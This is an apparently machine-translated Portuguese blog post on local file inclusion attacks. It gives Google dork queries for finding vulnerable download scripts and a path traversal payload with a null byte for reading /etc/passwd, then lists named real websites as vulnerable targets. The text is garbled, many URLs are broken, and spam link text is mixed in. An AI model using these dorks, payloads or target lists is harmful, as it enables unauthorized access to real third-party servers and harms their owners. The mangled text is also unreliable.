Uma maneira fácil de detectar vulnerabilidades existentes local de inclusão do arquivo é:
==> Ir para o Google.com e digite inurlile_download.php, ou inurlownload.php, ou inurlownloadpdf.php
==> Agora, encontrar um site que envia uma solicitação GET (filename =, download =, etc?) E remover tudo depois dela, e digite:
código:
.. /.. / etc% / passwd 00
Um prompt de download deve pop-up, e você deve obter o seu arquivo / etc / passwd.
Dica:
==> Se você quiser uma textura mais organizada do arquivo, eu recomendo fazer isso:
código:
exibição da fonte: http://www.site.com/../etc/passwd
| Sites vulneráveis |
http://www.dieppe.fr/etc/passwd
http://mairie-dieppe.fr/etc/group
http:/etc/passwd
http://etc/passwd
http://etc/etc/passwd00
00% http://etc/etc/passwd
00% http://sportske.jutarnji.hr/etc/passwd
00% http:/etc/passwd
http://etc/passwd00
00% http://bgnauka.com/etc/passwd
http://www.musique-loisir.fr/etc/passwd
00% http://www.clubdesgros.ch/etc/passwd
00% http:/etc/passwd
00% http://etc/etc/passwd
00% http://etc/passwd
http://ivicro.com.ar/etc/passwd00
00% http://etc/passwd
http://www.justinosmadeira.com/etc/passwd
00% http://etc/passwd
http://etc/passwd
http:/etc/passwd
http://www.ebhost.es/etc/passwd
http://etc/passwd
http://etc/passwd
Sáb Registo | Cash Advance | Consolidação de débito | Seguros | Relatório de Crédito gratuito no Sat34.org
http://etc/passwd
00% http://ezrn.jp/etc/passwd
Pics 'n' TRIPS - Bienvenue sur Trips'n'Pics
00% http:/etc/passwd
00% http://www.finisterehebdo.com/etc/passwd
http://etc/passwd
00% http://www.fondationpatrimonia.com/etc/passwd
http://etc/passwd
http:/etc/passwd
00% http://www.parcdumorvan.org/etc/etc/passwd
http://www.munchkin.com/etc/passwd
http://www.audiogram.com/etc/passwd
http://www.apcc21.net/etc/passwd
http://etc/passwd
http:/etc/passwd
Até o Proximo Post
Nenhum comentário:
Postar um comentário